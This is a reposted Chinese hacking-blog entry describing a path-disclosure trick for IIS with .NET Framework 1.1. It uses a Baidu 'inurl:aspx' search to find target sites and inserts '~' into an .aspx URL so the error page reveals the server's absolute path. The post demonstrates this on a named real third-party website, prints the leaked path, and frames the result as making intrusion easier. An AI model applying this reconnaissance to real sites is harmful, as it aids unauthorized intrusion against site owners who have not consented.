转自:虫子的BLOG http://cnxhack.blog.sohu.com/4609851.html
今天终于有了火狐的ID了..高兴ing...
感谢猪头三.哈.
进去看了一下,看到"NET IIS暴绝对路径漏洞 "这文章,不错,偷来贴贴. :)
.NET Framework Version:1.1 IIS 暴绝对路径漏洞:
举例说明:
在baidu.com里扫: inurl:aspx
找到很多ASPX的站.随便进一个.
http://www.sg.com.cn/jpbbs/denglu.aspx 这里吧.
写成这样:http://www.sg.com.cn/jpbbs/~denglu.aspx 回车, 出现错误信息如下:
========错误信息===============
“/jpbbs”应用程序中的服务器错误。
用于监视的文件名无效:“G:/xxf/jpbbs/~denglu.aspx”。用于监视的文件名必须具有绝对路径,并且不包含通配符。
========错误信息===============
呵,绝对路径出来了..
有了绝对路径,在入侵中会方便很多,怎么用?那就看你的啦. :)
PS:有些站加"~"后会而没有暴出路径.那就是不是.net Framework 1.1版本啦.或者代码被做容错处理了.(个人认为.哎 菜啊..)